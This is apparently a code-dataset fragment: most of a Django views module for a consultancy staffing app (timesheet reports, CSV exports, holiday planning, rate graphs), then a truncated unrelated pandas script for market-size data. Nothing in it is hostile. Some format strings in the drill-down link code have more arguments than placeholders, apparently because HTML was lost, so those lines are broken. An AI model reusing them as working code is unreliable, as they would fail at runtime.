accessed by ajax request. Redirect lost users\n return redirect(\"staffing:mission_home\", mission_id)\n\n # Gather timesheet (Only consider timesheet up to current month)\n timesheets = Timesheet.objects.filter(mission=mission).filter(working_date__lt=nextMonth(current_month)).order_by(\"working_date\")\n timesheetMonths = list(timesheets.dates(\"working_date\", \"month\"))\n\n # Gather forecaster (till current month)\n staffings = Staffing.objects.filter(mission=mission).filter(staffing_date__gte=current_month).order_by(\"staffing_date\")\n staffingMonths = list(staffings.dates(\"staffing_date\", \"month\"))\n\n missionData = [] # list of tuple (consultant, (charge month 1, charge month 2), (forecast month 1, forcast month2), estimated)\n for consultant in consultants:\n # Timesheet data\n timesheetData = []\n data = dict(timesheets.filter(consultant=consultant).extra(select={'month': dateTrunc(\"month\", \"working_date\")}).values_list(\"month\").annotate(Sum(\"charge\")).order_by(\"month\"))\n data = convertDictKeyToDate(data)\n\n for month in timesheetMonths:\n n_days = data.get(month, 0)\n timesheetData.append(n_days)\n\n timesheetData.append(sum(timesheetData)) # Add total per consultant\n timesheetData.append(timesheetData[-1] * consultant_rates[consultant][0] / 1000) # Add total in money\n\n # Forecast staffing data\n staffingData = []\n for month in staffingMonths:\n data = sum([t.charge for t in staffings.filter(consultant=consultant) if (t.staffing_date.month == month.month and t.staffing_date.year == month.year)])\n if timesheetMonths and \\\n date(timesheetMonths[-1].year, timesheetMonths[-1].month, 1) == current_month and \\\n date(month.year, month.month, 1) == current_month:\n # Remove timesheet days from current month forecast days\n data -= timesheetData[-3] # Last is total in money, the one before is total in days\n if data < 0:\n data = 0 # If timesheet is superior to forecasted, don't consider negative forecasting staffing\n staffingData.append(data)\n staffingData.append(sum(staffingData)) # Add total per consultant\n staffingData.append(staffingData[-1] * consultant_rates[consultant][0] / 1000) # Add total in money\n\n # Estimated (= timesheet + forecast staffing)\n estimatedData = (timesheetData[-2] + staffingData[-2], timesheetData[-1] + staffingData[-1])\n # Add tuple to data\n missionData.append((consultant, timesheetData, staffingData, estimatedData))\n\n # Compute the total daily rate for each month of the mission\n timesheetTotalAmount = []\n staffingTotalAmount = []\n for consultant, timesheet, staffing, estimated in missionData:\n rate = consultant_rates[consultant][0]\n # We don't compute the average rate for total (k€) columns, hence the [:-1]\n valuedTimesheet = [days * rate / 1000 for days in timesheet[:-1]]\n valuedStaffing = [days * rate / 1000 for days in staffing[:-1]]\n timesheetTotalAmount = [sum(x) for x in zip_longest(timesheetTotalAmount, valuedTimesheet, fillvalue=0)]\n staffingTotalAmount = [sum(x) for x in zip_longest(staffingTotalAmount, valuedStaffing, fillvalue=0)]\n\n # Compute total per month\n timesheetTotal = [timesheet for consultant, timesheet, staffing, estimated in missionData]\n timesheetTotal = zip(*timesheetTotal) # [ [1, 2, 3], [4, 5, 6]... ] => [ [1, 4], [2, 5], [4, 6]...]\n timesheetTotal = [sum(t) for t in timesheetTotal]\n staffingTotal = [staffing for consultant, timesheet, staffing, estimated in missionData]\n staffingTotal = zip(*staffingTotal) # [ [1, 2, 3], [4, 5, 6]... ] => [ [1, 4], [2, 5], [4, 6]...]\n staffingTotal = [sum(t) for t in staffingTotal]\n\n # average = total 1000 * rate / number of billed days\n timesheetAverageRate = list(map(lambda t, d: (1000 * t / d) if d else 0, timesheetTotalAmount, timesheetTotal[:-1]))\n staffingAverageRate = list(map(lambda t, d: (1000 * t / d) if d else 0, staffingTotalAmount, staffingTotal[:-1]))\n\n # Total estimated (timesheet + staffing)\n if timesheetTotal and staffingTotal:\n estimatedTotal = (timesheetTotal[-2] + staffingTotal[-2], timesheetTotal[-1] + staffingTotal[-1])\n else:\n estimatedTotal = (0, 0)\n\n if mission.price and timesheetTotal and staffingTotal and mission.billing_mode == \"FIXED_PRICE\":\n margin = float(mission.price) - timesheetTotal[-1] - staffingTotal[-1]\n margin = to_int_or_round(margin, 3)\n daysTotal = timesheetTotal[-2] + staffingTotal[-2]\n avgDailyRate = int((1000.0 * float(mission.price) / daysTotal)) if daysTotal > 0 else 0\n else:\n margin = 0\n avgDailyRate = 0\n\n if mission.price and timesheetTotal and staffingTotal and mission.billing_mode == \"TIME_SPENT\":\n currentUnused = to_int_or_round(float(mission.price) - timesheetTotal[-1], 1)\n forecastedUnused = to_int_or_round(float(mission.price) - timesheetTotal[-1] - staffingTotal[-1], 1)\n else:\n currentUnused = 0\n forecastedUnused = 0\n\n # pad to 8 values\n padded_mission_data = []\n for consultant, timesheet, staffing, estimated in missionData:\n padded_mission_data.append((consultant, timesheet, staffing, estimated, None, None, None, None))\n missionData = padded_mission_data\n\n # add total\n missionData.append((None, timesheetTotal, staffingTotal, estimatedTotal,\n timesheetTotalAmount[:-1], staffingTotalAmount[:-1], # We remove last one not to display total twice\n timesheetAverageRate, staffingAverageRate))\n\n missionData = list(map(to_int_or_round, missionData))\n\n objectiveMargin = mission.objectiveMargin(endDate=nextMonth(current_month))\n\n # Prepare data for graph\n isoTimesheetDates = [t.isoformat() for t in timesheetMonths]\n if len(timesheetMonths) > 0:\n minDate = previousMonth(timesheetMonths[0]).isoformat()\n else:\n minDate = previousMonth(date.today()).isoformat()\n isoStaffingDates = [t.isoformat() for t in staffingMonths]\n if len(isoStaffingDates) > 0 and len(isoTimesheetDates) > 0:\n if isoTimesheetDates[-1] == isoStaffingDates[0]:\n # We have an overlap\n isoDates = isoTimesheetDates + isoStaffingDates[1:]\n graph_timesheet = timesheetTotalAmount[:-1] + [0,]*len(isoStaffingDates[1:])\n graph_staffing = [0,]*len(isoTimesheetDates[:-1]) + staffingTotalAmount[:-1]\n else:\n # Both timesheet and staffing but no overlap\n isoDates = isoTimesheetDates + isoStaffingDates\n graph_timesheet = timesheetTotalAmount[:-1] + [0,]*len(isoStaffingDates)\n graph_staffing = [0,]*len(isoTimesheetDates) + staffingTotalAmount[:-1]\n else:\n # Only timesheet or staffing\n isoDates = isoTimesheetDates + isoStaffingDates\n graph_timesheet = timesheetTotalAmount[:-1]\n graph_staffing = [0,]*len(isoTimesheetDates) + staffingTotalAmount[:-1]\n\n graph_data = [[\"dataTimesheet\"] + to_int_or_round(cumulateList(graph_timesheet)),\n [\"dataStaffing\"] + to_int_or_round(cumulateList(graph_staffing)),\n [\"dates\"] + isoDates]\n\n return render(request, \"staffing/mission_timesheet.html\",\n {\"mission\": mission,\n \"margin\": margin,\n \"objective_margin\": objectiveMargin,\n \"objective_margin_total\": sum(objectiveMargin.values()),\n \"forecasted_unused\": forecastedUnused,\n \"current_unused\": currentUnused,\n \"timesheet_months\": timesheetMonths,\n \"staffing_months\": staffingMonths,\n \"mission_data\": missionData,\n \"consultant_rates\": consultant_rates,\n \"avg_daily_rate\": avgDailyRate,\n \"graph_data\": json.dumps(graph_data),\n \"graph_data_timesheet\": json.dumps(graph_data),\n \"series_colors\": COLORS,\n \"min_date\" : minDate,\n \"user\": request.user})\n\n\n@pydici_non_public\n@pydici_feature(\"reports\")\ndef mission_csv_timesheet(request, mission, consultants):\n \"\"\"@return: csv timesheet for a given mission\"\"\"\n # This \"view\" is never called directly but only through consultant_timesheet view\n response = HttpResponse(content_type=\"text/csv\")\n response[\"Content-Disposition\"] = \"attachment; filename=%s.csv\" % mission.mission_id()\n writer = csv.writer(response, delimiter=';')\n for line in timesheet_report_data(mission, padding=True):\n writer.writerow(line)\n\n return response\n\nclass MissionTimesheetReportPdf(PydiciNonPublicdMixin, WeasyTemplateView):\n template_name = 'staffing/mission_timesheet_report.html'\n\n def get_context_data(self, **kwargs):\n context = super(MissionTimesheetReportPdf, self).get_context_data(**kwargs)\n self.mission = self.kwargs[\"mission\"]\n context[\"mission\"] = self.mission\n context[\"timesheet_data\"] = timesheet_report_data(self.mission, padding=True,\n start=self.kwargs.get(\"start\"),\n end=self.kwargs.get(\"end\"))\n return context\n\n\n @method_decorator(pydici_feature(\"reports\"))\n def dispatch(self, *args, **kwargs):\n return super(MissionTimesheetReportPdf, self).dispatch(*args, **kwargs)\n\n@pydici_non_public\n@pydici_feature(\"reports\")\ndef all_timesheet(request, year=None, month=None):\n if year and month:\n month = date(int(year), int(month), 1)\n else:\n month = date.today().replace(day=1) # We use the first day to represent month\n\n previous_date = (month - timedelta(days=5)).replace(day=1)\n next_date = nextMonth(month)\n\n timesheets = Timesheet.objects.filter(working_date__gte=month) # Filter on current month\n timesheets = timesheets.filter(working_date__lt=next_date.replace(day=1)) # Discard next month\n timesheets = timesheets.values(\"consultant\", \"mission\") # group by consultant, mission\n timesheets = timesheets.annotate(sum=Sum('charge')).order_by(\"mission\", \"consultant\") # Sum and clean order by (else, group by won't work because of default ordering)\n consultants = list(set([i[\"consultant\"] for i in timesheets]))\n missions = list(set([i[\"mission\"] for i in timesheets]))\n consultants = Consultant.objects.filter(id__in=consultants).order_by(\"name\")\n missions = sortMissions(Mission.objects.filter(id__in=missions))\n charges = {}\n if \"csv\" in request.GET:\n # Simple consultant list\n data = list(consultants)\n else:\n # drill down link\n data = [mark_safe(\"%s\" % (reverse(\"people:consultant_home\", args=[consultant.trigramme]),\n month.year,\n month.month,\n escape(str(consultant)))) for consultant in consultants]\n data = [[_(\"Mission\"), _(\"Mission id\")] + data]\n for timesheet in timesheets:\n charges[(timesheet[\"mission\"], timesheet[\"consultant\"])] = to_int_or_round(timesheet[\"sum\"], 2)\n for mission in missions:\n missionUrl = \"%s\" % (reverse(\"staffing:mission_home\", args=[mission.id, ]),\n escape(str(mission)))\n if \"csv\" in request.GET:\n # Simple mission name\n consultantData = [str(mission), mission.mission_id()]\n else:\n # Drill down link\n consultantData = [mark_safe(missionUrl), mission.mission_id()]\n for consultant in consultants:\n consultantData.append(charges.get((mission.id, consultant.id), 0))\n data.append(consultantData)\n charges = data\n\n # Compute total per consultant\n if len(charges) > 1:\n total = [i[2:] for i in charges[1:]]\n total = zip(*total) # [ [1, 2, 3], [4, 5, 6]... ] => [ [1, 4], [2, 5], [4, 6]...]\n total = [sum(t) for t in total]\n charges.append([_(\"Total\"), \"\"] + total)\n else:\n # Set charges to None to allow proper message on template\n charges = None\n\n # Add days without lunch ticket\n ticketData = []\n for consultant in consultants:\n lunchTickets = LunchTicket.objects.filter(consultant=consultant)\n lunchTickets = lunchTickets.filter(lunch_date__gte=month).filter(lunch_date__lt=next_date)\n ticketData.append(lunchTickets.count())\n\n if charges:\n charges.append([_(\"Days without lunch ticket\"), \"\"] + ticketData)\n\n # , Cons1, Cons2, Cons3\n # Mission 1, M1/C1, M1/C2, M1/C3\n # Mission 2, M2/C1, M2/C2, M2/C3\n # with. tk C1, C2, C3...\n\n if \"csv\" in request.GET and charges:\n # Return CSV timesheet\n return all_csv_timesheet(request, charges, month)\n else:\n # Return html page\n return render(request, \"staffing/all_timesheet.html\",\n {\"user\": request.user,\n \"next_date\": next_date,\n \"previous_date\": previous_date,\n \"month\": month,\n \"consultants\": consultants,\n \"missions\": missions,\n \"charges\": charges})\n\n\n@pydici_non_public\n@pydici_feature(\"reports\")\ndef all_csv_timesheet(request, charges, month):\n response = HttpResponse(content_type=\"text/csv\")\n response[\"Content-Disposition\"] = \"attachment; filename=%s\" % _(\"timesheet.csv\")\n writer = csv.writer(response, delimiter=';')\n\n # Header\n writer.writerow(month)\n for charge in charges:\n row = []\n for i in charge:\n if isinstance(i, float):\n i = formats.number_format(i)\n row.append(i)\n writer.writerow(row)\n return response\n\n\n@pydici_non_public\n@pydici_feature(\"reports\")\ndef detailed_csv_timesheet(request, year=None, month=None):\n \"\"\"Detailed timesheet with mission, consultant, and rates\n Intended for accounting third party system or spreadsheet analysis\"\"\"\n response = HttpResponse(content_type=\"text/csv\")\n response[\"Content-Disposition\"] = \"attachment; filename=%s\" % _(\"timesheet.csv\")\n writer = csv.writer(response, delimiter=';')\n\n if year and month:\n month = date(int(year), int(month), 1)\n else:\n month = date.today().replace(day=1) # We use the first day to represent month\n\n next_month = nextMonth(month)\n\n # Header\n header = [_(\"Lead\"), _(\"Deal id\"), _(u\"Lead Price (k€)\"), _(\"Mission\"), _(\"Mission id\"), _(\"Billing mode\"), _(u\"Mission Price (k€)\"),\n _(\"Consultant\"), _(\"Daily rate\"), _(\"Bought daily rate\"), _(\"Past done days\"), _(\"Done days\"), _(\"Days to be done\")]\n writer.writerow([month,])\n writer.writerow(header)\n\n missions = Mission.objects.filter(Q(timesheet__working_date__gte=month, timesheet__working_date__lt=next_month) |\n Q(staffing__staffing_date__gte=month, staffing__staffing_date__lt=next_month))\n missions = missions.distinct().order_by(\"lead\")\n\n for mission in missions:\n for consultant in mission.consultants():\n row = [mission.lead if mission.lead else \"\", mission.lead.deal_id if mission.lead else \"\",\n mission.lead.sales if mission.lead else 0, mission,\n mission.mission_id(), mission.get_billing_mode_display(),\n formats.number_format(mission.price) if mission.price else 0, consultant]\n # Rates\n try:\n financialCondition = FinancialCondition.objects.get(consultant=consultant, mission=mission)\n row.append(formats.number_format(financialCondition.daily_rate) if financialCondition.daily_rate else 0)\n row.append(formats.number_format(financialCondition.bought_daily_rate) if financialCondition.bought_daily_rate else 0)\n except FinancialCondition.DoesNotExist:\n row.extend([0, 0])\n # Past timesheet\n timesheet = Timesheet.objects.filter(mission=mission, consultant=consultant,\n working_date__lt=month).aggregate(Sum(\"charge\")).values()[0]\n row.append(formats.number_format(timesheet) if timesheet else 0)\n # Current month timesheet\n timesheet = Timesheet.objects.filter(mission=mission, consultant=consultant,\n working_date__gte=month,\n working_date__lt=next_month).aggregate(Sum(\"charge\")).values()[0]\n row.append(formats.number_format(timesheet) if timesheet else 0)\n # Forecasted staffing\n forecast = Staffing.objects.filter(mission=mission, consultant=consultant,\n staffing_date__gte=next_month).aggregate(Sum(\"charge\")).values()[0]\n row.append(formats.number_format(forecast) if forecast else 0)\n\n writer.writerow(row)\n\n return response\n\n\n@pydici_non_public\n@pydici_feature(\"management\")\ndef holidays_planning(request, year=None, month=None):\n \"\"\"Display forecasted holidays of all consultants\"\"\"\n # We use the first day to represent month\n if year and month:\n month = date(int(year), int(month), 1)\n else:\n month = date.today().replace(day=1)\n\n holidays_days = Holiday.objects.all().values_list(\"day\", flat=True)\n days = daysOfMonth(month)\n data = []\n # TODO: holidays (jours fériés\n # TODO: week end)\n\n if date.today().replace(day=1) == month:\n today = datetime.today().day\n else:\n today = 0\n\n next_month = nextMonth(month)\n previous_month = previousMonth(month)\n for consultant in Consultant.objects.filter(active=True, subcontractor=False):\n consultantData = [consultant, ]\n consultantHolidays = Timesheet.objects.filter(working_date__gte=month, working_date__lt=next_month,\n consultant=consultant, mission__nature=\"HOLIDAYS\", charge__gt=0).values_list(\"working_date\", flat=True)\n for day in days:\n if day.isoweekday() in (6, 7) or day in holidays_days:\n consultantData.append(\"lightgrey\")\n elif day in consultantHolidays:\n consultantData.append(\"#56160C\")\n else:\n consultantData.append(\"#F6F6F6\")\n data.append(consultantData)\n return render(request, \"staffing/holidays_planning.html\",\n {\"days\": days,\n \"data\": data,\n \"month\": month,\n \"today\": today,\n \"previous_month\": previous_month,\n \"next_month\": next_month,\n \"user\": request.user, })\n\n\n@pydici_non_public\n@pydici_feature(\"reports\")\ndef missions_report(request, year=None, nature=\"HOLIDAYS\"):\n \"\"\"Reports about holidays or non-prod missions\"\"\"\n data = []\n dateTrunc = connections[Timesheet.objects.db].ops.date_trunc_sql # Shortcut to SQL date trunc function\n month = int(get_parameter(\"FISCAL_YEAR_MONTH\"))\n\n timesheets = Timesheet.objects.filter(mission__nature=nature, working_date__lte=date.today())\n\n years = get_fiscal_years(timesheets, \"working_date\")\n\n if not years:\n return HttpResponse()\n\n if year is None and years:\n year = years[-1]\n\n if year != \"all\":\n year = int(year)\n start = date(year, month, 1)\n end = date(year+1, month, 1)\n timesheets = timesheets.filter(working_date__gte=start, working_date__lt=end)\n\n timesheets =timesheets.extra(select={'month': dateTrunc(\"month\", \"working_date\")})\n timesheets = timesheets.values(\"month\", \"mission__description\", \"consultant__name\", \"consultant__profil__name\", \"consultant__company__name\").annotate(Sum(\"charge\")).order_by(\"month\")\n\n for timesheet in timesheets:\n # Thank you sqlite for those sad lines of code\n month = timesheet[\"month\"]\n if month and isinstance(month, (datetime, date)):\n month = month.strftime(\"%Y-%m\")\n data.append({\n _(u\"month\") : month,\n _(u\"type\"): timesheet[\"mission__description\"],\n _(u\"consultant\"): timesheet[\"consultant__name\"],\n _(u\"subsidiary\"): timesheet[\"consultant__company__name\"],\n _(u\"profil\"): timesheet[\"consultant__profil__name\"],\n _(u\"days\"): timesheet[\"charge__sum\"],\n })\n\n return render(request, \"staffing/missions_report.html\", {\"data\": json.dumps(data),\n \"years\": years,\n \"selected_year\": year,\n \"nature\": nature,\n \"derivedAttributes\": [],})\n\n\n\n@pydici_non_public\n@pydici_feature(\"leads\")\n@permission_required(\"staffing.add_mission\")\ndef create_new_mission_from_lead(request, lead_id):\n \"\"\"Create a new mission on the given lead. Mission are created with same nature\n and probability than the fist mission.\n Used when a lead has more than one mission as only the default (first) mission\n is created during standard lead workflow.\n An error message will be returned if the given lead does not already have a mission\"\"\"\n try:\n lead = Lead.objects.get(id=lead_id)\n except Lead.DoesNotExist:\n raise Http404\n\n if lead.mission_set.count() == 0:\n # No mission defined, return an error\n return HttpResponse(_(\"This lead has no mission defined\"))\n\n # We use first mission as model to create to new one\n modelMission = lead.mission_set.all()[0]\n\n # Create new mission on this lead\n mission = Mission()\n mission.lead = lead\n mission.responsible = lead.responsible\n mission.nature = modelMission.nature\n mission.probability = modelMission.probability\n mission.probability_auto = True\n mission.subsidiary = lead.subsidiary\n mission.save()\n mission.create_default_staffing() # Initialize default staffing\n\n # Redirect user to change page of the mission\n # in order to type description and deal id\n return HttpResponseRedirect(reverse(\"staffing:mission_update\", args=[mission.id, ]) + \"?return_to=\" + lead.get_absolute_url() + \"#goto_tab-missions\")\n\n\n@pydici_non_public\ndef mission_consultant_rate(request):\n \"\"\"Select or create financial condition for this consultant/mission tuple and update it\n This is intended to be used through a jquery jeditable call\"\"\"\n if not (request.user.has_perm(\"staffing.add_financialcondition\") and\n request.user.has_perm(\"staffing.change_financialcondition\")):\n return HttpResponse(_(\"You are not allowed to do that\"))\n try:\n sold, mission_id, consultant_id = request.POST[\"id\"].split(\"-\")\n mission = Mission.objects.get(id=mission_id)\n consultant = Consultant.objects.get(id=consultant_id)\n condition, created = FinancialCondition.objects.get_or_create(mission=mission, consultant=consultant,\n defaults={\"daily_rate\": 0})\n if sold == \"sold\":\n condition.daily_rate = request.POST[\"value\"].replace(\" \", \"\")\n else:\n condition.bought_daily_rate = request.POST[\"value\"].replace(\" \", \"\")\n condition.save()\n return HttpResponse(request.POST[\"value\"])\n except (Mission.DoesNotExist, Consultant.DoesNotExist):\n return HttpResponse(_(\"Mission or consultant does not exist\"))\n except ValueError:\n return HttpResponse(_(\"Incorrect value\"))\n\n\n@pydici_non_public\n@pydici_feature(\"staffing\")\ndef mission_update(request):\n \"\"\"Update mission attribute (probability and billing_mode).\n This is intended to be used through a jquery jeditable call\"\"\"\n if request.method == \"GET\":\n # Return authorized values\n if request.GET[\"id\"].startswith(\"billing_mode\"):\n values = Mission.BILLING_MODES\n elif request.GET[\"id\"].startswith(\"probability\"):\n values = Mission.PROBABILITY\n else:\n values = {}\n return HttpResponse(json.dumps(dict(values)))\n elif request.method == \"POST\":\n # Update mission attributes\n attribute, mission_id = request.POST[\"id\"].split(\"-\")\n value = request.POST[\"value\"]\n mission = Mission.objects.get(id=mission_id) # If no mission found, it fails, that's what we want\n billingModes = dict(Mission.BILLING_MODES)\n probability = dict(Mission.PROBABILITY)\n if attribute == \"billing_mode\":\n if value in billingModes:\n mission.billing_mode = value\n mission.save()\n return HttpResponse(billingModes[value])\n elif attribute == \"probability\":\n value = int(value)\n if value in probability:\n mission.probability = value\n mission.probability_auto = False\n mission.save()\n return HttpResponse(probability[value])\n # Not GET or POST ? Or not explicit attribute ?\n # Do not answer to garbage question, just return\n return\n\n\n@pydici_non_public\ndef mission_contacts(request, mission_id):\n \"\"\"Mission contacts: business, work, administrative\n This views is intented to be called in ajax\"\"\"\n\n mission = Mission.objects.get(id=mission_id)\n if request.method == \"POST\":\n form = MissionContactsForm(request.POST, instance=mission)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse(\"staffing:mission_home\", args=[mission.id, ]))\n\n # Unbound form\n form = MissionContactsForm(instance=mission)\n # TODO: add link to add mission contact\n missionContacts = mission.contacts.select_related().order_by(\"company\")\n return render(request, \"staffing/mission_contacts.html\",\n {\"mission\": mission,\n \"mission_contacts\": missionContacts,\n \"mission_contact_form\": form})\n\n\nclass MissionUpdate(PydiciNonPublicdMixin, UpdateView):\n model = Mission\n template_name = \"core/form.html\"\n form_class = MissionForm\n\n def get_success_url(self):\n return self.request.GET.get('return_to', False) or reverse_lazy(\"staffing:mission_home\", args=[self.object.id, ])\n\n\n@pydici_non_public\n@pydici_feature(\"reports\")\n@cache_page(60 * 10)\ndef graph_timesheet_rates_bar(request, subsidiary_id=None, team_id=None):\n \"\"\"Nice graph bar of timesheet prod/holidays/nonprod rates\n @:param subsidiary_id: filter graph on the given subsidiary\n @:param team_id: filter graph on the given team\n @todo: per year, with start-end date\"\"\"\n dateTrunc = connections[Timesheet.objects.db].ops.date_trunc_sql # Shortcut to SQL date trunc function\n data = {} # Graph data\n natures = [i[0] for i in Mission.MISSION_NATURE] # Mission natures id\n natures_label = [i[1] for i in Mission.MISSION_NATURE] # Mission natures label\n nature_data = {}\n holiday_days = [h.day for h in Holiday.objects.all()]\n graph_data = []\n\n # Create dict per mission nature\n for nature in natures:\n data[nature] = {}\n\n # Compute date data\n timesheetStartDate = (date.today() - timedelta(365)).replace(day=1) # Last year, begin of the month\n timesheetEndDate = nextMonth(date.today()) # First day of next month\n\n # Filter on scope\n if team_id:\n timesheets = Timesheet.objects.filter(consultant__staffing_manager_id=team_id)\n elif subsidiary_id:\n timesheets = Timesheet.objects.filter(consultant__company_id=subsidiary_id)\n else:\n timesheets = Timesheet.objects.all()\n\n timesheets = timesheets.filter(consultant__subcontractor=False,\n consultant__productive=True,\n working_date__gt=timesheetStartDate,\n working_date__lt=timesheetEndDate).select_related()\n\n timesheetMonths = timesheets.dates(\"working_date\", \"month\")\n isoTimesheetMonths = [d.isoformat() for d in timesheetMonths]\n\n if not timesheetMonths:\n return HttpResponse('')\n\n nConsultant = dict(timesheets.extra(select={'month': dateTrunc(\"month\", \"working_date\")}).values_list(\"month\").annotate(Count(\"consultant__id\", distinct=True)).order_by())\n nConsultant = convertDictKeyToDate(nConsultant)\n\n for nature, label in zip(natures, natures_label):\n nature_data[nature] = []\n data = dict(timesheets.filter(mission__nature=nature).extra(select={'month': dateTrunc(\"month\", \"working_date\")}).values_list(\"month\").annotate(Sum(\"charge\")).order_by(\"month\"))\n data = convertDictKeyToDate(data)\n for month in timesheetMonths:\n nature_data[nature].append(round(100 * data.get(month, 0) / (working_days(month, holiday_days) * nConsultant.get(month, 1)), 1))\n graph_data.append([label] + nature_data[nature])\n\n prodRate = []\n for prod, nonprod in zip(nature_data[\"PROD\"], nature_data[\"NONPROD\"]):\n if (prod + nonprod) > 0:\n prodRate.append(\"%.1f\" % (100 * prod / (prod + nonprod)))\n else:\n prodRate.append(\"0\")\n\n graph_data.append([_(\"production rate\")] + prodRate)\n graph_data.append([\"x\"] + isoTimesheetMonths)\n\n return render(request, \"staffing/graph_timesheet_rates_bar.html\",\n {\"graph_data\": json.dumps(graph_data),\n \"natures_display\": natures_label,\n \"series_colors\": COLORS[:3] + ['#333'], # Use grey for prod rate to ease readibility\n \"user\": request.user})\n\n\n@pydici_non_public\n@cache_page(60 * 10)\ndef graph_profile_rates(request, subsidiary_id=None, team_id=None):\n \"\"\"Sale rate per profil\n @:param subsidiary_id: filter graph on the given subsidiary\n @:param team_id: filter graph on the given team\"\"\"\n #TODO: add start/end timeframe\n graph_data = []\n turnover = {}\n nDays = {}\n avgDailyRate = {}\n globalDailyRate = []\n isoTimesheetMonths = []\n timesheetStartDate = (date.today() - timedelta(365)).replace(day=1) # Last year, begin of the month\n timesheetEndDate = nextMonth(date.today()) # First day of next month\n profils = dict(ConsultantProfile.objects.all().values_list(\"id\", \"name\")) # Consultant Profiles\n\n consultants = Consultant.objects.filter(subcontractor=False, productive=True,\n timesheet__working_date__gte=timesheetStartDate,\n timesheet__working_date__lt=timesheetEndDate)\n\n # Filter on scope\n if team_id:\n consultants = consultants.filter(staffing_manager_id=team_id)\n elif subsidiary_id:\n consultants = consultants.filter(company_id=subsidiary_id)\n\n consultants = consultants.distinct()\n\n for profil, profilName in profils.items():\n nDays[profil] = {}\n turnover[profil] = {}\n avgDailyRate[profil] = {}\n\n month = timesheetStartDate\n while month < timesheetEndDate:\n next_month = nextMonth(month)\n isoTimesheetMonths.append(month.isoformat())\n monthGlobalNDays = 0\n monthGlobalTurnover = 0\n for consultant in consultants:\n if not month in nDays[consultant.profil_id]:\n nDays[consultant.profil.id][month] = 0\n if not month in turnover[consultant.profil_id]:\n turnover[consultant.profil_id][month] = 0\n nDays[consultant.profil_id][month] += Timesheet.objects.filter(consultant=consultant, working_date__gte=month, working_date__lt=next_month, mission__nature=\"PROD\").aggregate(Sum(\"charge\"))[\"charge__sum\"] or 0\n turnover[consultant.profil_id][month] += consultant.getTurnover(month, next_month)\n\n for profil, profilName in profils.items():\n if profil in nDays:\n try:\n avgDailyRate[profil][month] = round(turnover[profil][month] / nDays[profil][month])\n monthGlobalNDays += nDays[profil][month]\n monthGlobalTurnover += turnover[profil][month]\n except (KeyError, ZeroDivisionError):\n avgDailyRate[profil][month] = None\n if monthGlobalNDays > 0 :\n globalDailyRate.append(round(monthGlobalTurnover / monthGlobalNDays))\n else:\n globalDailyRate.append(None)\n month = next_month\n\n if not isoTimesheetMonths or set(globalDailyRate) == {None}:\n return HttpResponse('')\n\n graph_data.append([\"x\"] + isoTimesheetMonths)\n\n # Compute per profil\n for profil, profilName in profils.items():\n data = [profilName]\n month = timesheetStartDate\n while month < timesheetEndDate:\n data.append(avgDailyRate[profil][month])\n month = nextMonth(month)\n graph_data.append(data)\n\n graph_data.append([_(\"Global\"), *globalDailyRate ])\n\n return render(request, \"staffing/graph_profile_rates.html\",\n {\"graph_data\": json.dumps(graph_data),\n \"series_colors\": COLORS,\n \"user\": request.user})\n\n\n@pydici_non_public\n@cache_page(60 * 60 * 4)\ndef graph_consultant_rates(request, consultant_id):\n \"\"\"Nice graph of consultant rates\"\"\"\n dailyRateData = [] # Consultant daily rate data\n dailyRateObj = [] # daily rate objective for month\n prodRateData = [] # Consultant production rate data\n prodRateObj = [] # production rate objective for month\n isoRateDates = [] # List of date in iso format for daily rates data\n isoProdDates = [] # List of date in iso format for production rates data\n graph_data = [] # Data that will be returned to jqplot\n consultant = Consultant.objects.get(id=consultant_id)\n startDate = (date.today() - timedelta(24 * 30)).replace(day=1)\n\n timesheets = Timesheet.objects.filter(consultant=consultant, charge__gt=0, working_date__gte=startDate, working_date__lt=nextMonth(date.today()))\n kdates = list(timesheets.dates(\"working_date\", \"month\"))\n\n # Avg daily rate / month and objective rate\n for refDate in kdates:\n next_month = nextMonth(refDate)\n prodRate = consultant.getProductionRate(refDate, next_month)\n if prodRate:\n prodRateData.append(round(100 * prodRate, 1))\n isoProdDates.append(refDate.isoformat())\n wdays = Timesheet.objects.filter(consultant=consultant, working_date__gte=refDate, working_date__lt=next_month, mission__nature=\"PROD\").aggregate(Sum(\"charge\"))[\"charge__sum\"]\n if wdays:\n turnover = consultant.getTurnover(refDate, next_month)\n dailyRateData.append(int(turnover / wdays))\n isoRateDates.append(refDate.isoformat())\n rate = consultant.getRateObjective(refDate, rate_type=\"DAILY_RATE\")\n if rate:\n dailyRateObj.append(rate.rate)\n else:\n dailyRateObj.append(None)\n rate = consultant.getRateObjective(refDate, rate_type=\"PROD_RATE\")\n if rate:\n prodRateObj.append(rate.rate)\n else:\n prodRateObj.append(None)\n\n graph_data = [\n [\"x_daily_rate\"] + isoRateDates,\n [\"x_prod_rate\"] + isoProdDates,\n [\"y_daily_rate\"] + dailyRateData,\n [\"y_prod_rate\"] + prodRateData,\n [\"y_daily_rate_obj\"] + dailyRateObj,\n [\"y_prod_rate_obj\"] + prodRateObj,\n ]\n\n return render(request, \"staffing/graph_consultant_rate.html\",\n {\"graph_data\": json.dumps(graph_data),\n \"user\": request.user})\n","sub_path":"staffing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":73328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"139575767","text":"\nimport pandas as pd\nimport os\n\nPERIOD = '2013-07'\nDATA_DIR = '/Users/perezrafael/appannie/data_science/sbe_benchmark/data'\nMARKET_SIZE = '/Users/perezrafael/appannie/data/market_size_%s.csv'%PERIOD\n\n\nMARKET_TYPE_DICT = {'Free': 'Downloads',\n 'Paid': 'Downloads',\n 'Grossing w/ IAP': 'Revenue',\n 'Grossing w/o IAP': 'Revenue',\n }\n\nUNIT_DICT = {'Downloads': 'Downloads',\n 'USD': 'Revenue'}\n\nRANGE_WEIGHT_DICT = {'1 to 10': 1.0,\n '11 to 20': 0.9,\n '21 to 200': 0.5,\n '201 to end': 0.1}\n\ndef process_df(df):\n df = df[df['index']=='best_case']\n df = df.groupby(['store_id', 'feed_id', 'category_id', 'range']).sum().reset_index()\n return df \n\n\n\ndef process_market_size(df):\n df = df[df['Store']=='iOS']\n df['category_id'] = df['Category'].apply(lambda x: x.replace('Games ', ''))\n df['feed_id'] = df['Unit'].apply(lambda x: UNIT_DICT[x])\n df['store_id'] = df['Country']\n df = df.groupby(['store_id', 'category_id', 'feed_id', 'Period', 'Version', 'Value Type', 'Store']).sum().reset_index()\n df.rename(columns={'Value':'market_size'}, inplace=True)\n return df\n\ndef main():\n market_size_df = 